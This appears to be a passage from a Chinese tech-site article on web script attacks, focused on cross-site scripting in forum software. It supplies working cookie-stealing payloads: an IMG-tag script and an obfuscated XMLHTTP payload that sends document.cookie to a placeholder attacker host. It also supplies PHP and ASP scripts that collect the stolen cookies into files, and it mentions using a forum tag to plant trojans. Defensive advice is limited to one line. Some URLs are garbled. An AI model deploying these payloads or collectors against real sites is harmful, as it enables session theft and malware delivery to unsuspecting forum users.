【IT168 专稿】首先我们先要知道什么是脚本，脚本就是运行在网页服务器上的文本程序，例如：ASP、PHP、CGI、JSP、ISAP等等，脚本的攻击就是利用这些文件的设置和编写时的错误或者疏忽不当，攻击者就可以利用这些来达到自己攻击目的，如果一个服务器存在这些漏洞，那么它的沦陷也是时间的问题！

    这些文本文件一般都是要结合数据库来使用的，这些数据库有ACCESS、MSSQL、MYSQL、Oracle等！脚本攻击就是针对这些数据库来配合脚本对一些变量的过滤不严的问题来达到得到用户密码等敏感信息，修改数据库等目的！下面我就针对这些来分别举例说明！

    一、跨站脚本的攻击

    脚本的跨站（CSS/XSS）就是利用程序对用户提交的变量不严，大多数是利用多媒体标签，前段时间比较流行的flash跨站就是利用的这个，比如我在[FLASH=450,350][/FLASH]之间插入一个我自己作好的一个swf文件，swf文件里我们用geturl里加上javascript:window.open('_blank>http://qfaq.yeah.net')就可以让他打开清风安全网的网站，如果这里是一个木马网页，呵呵，你就等着中木马吧！还有就是窃取用户的cookie，例如我们利用[IMG][/IMG]也就是图片的跨站，在这个里面插入
<script language=javascript>window.open('_blank>http://xxx/xxx.asp?msg=&#39; documents.cookie)</script>这段地址即可得到！

    如果将javascript过滤掉后怎么办？

    好，我们在看看下面这段代码：

    [upload=swf]uploadImages/200310812145390577.swf?"><sCript>aa="var" unescape(" ") "dat;dat=escape(document.cookie);var" unescape(" ") "http=new" unescape(" ") "ActiveXObject('Microsoft.XMLHTTP');ht" "tp.open" unescape(" ") "('POST','ht' 'tp://xxx/bbs/usersms.asp?action=send&touser=czy&title=flashcookie&submit=发送&message=' dat,false);http.send();";eval(aa)</sCript>[/upload]

    怎么样，还是能将你的信息得到的，而且还不会弹出对话框！

    另外在joekoe论坛程序里还有一个这样的问题，比如你发个帖子里有[DIR][/DIR]就会弹出一个播放器的安装程序，呵呵，如果是一个黑心的站长利用这个来放马，那后果就不用说了吧！

    解决办法：现在还没有好的方法解决这个问题，你要做的就是将多媒体的标签删掉！

    另附ASP和PHP的跨站代码

    php如下：

    <?php
    $info = getenv("QUERY_STRING");
    if ($info) {
    $fp = fopen("test.txt","a");
    fwrite($fp,$info."n");
    fclose($fp);
    }
    ?>

    <script language=vbscript>
    document.location="_blank>http://";
    </script>

    asp如下：

    <%
    testfile=Server.MapPath("cookies.txt")
    msg=Request("msg")
    set fs=server.CreateObject("scripting.filesystemobject")
    set thisfile=fs.OpenTextFile(testfile,8,True,0)
    thisfile.WriteLine(""&msg& "")
    thisfile.close
    set fs = nothing
    %>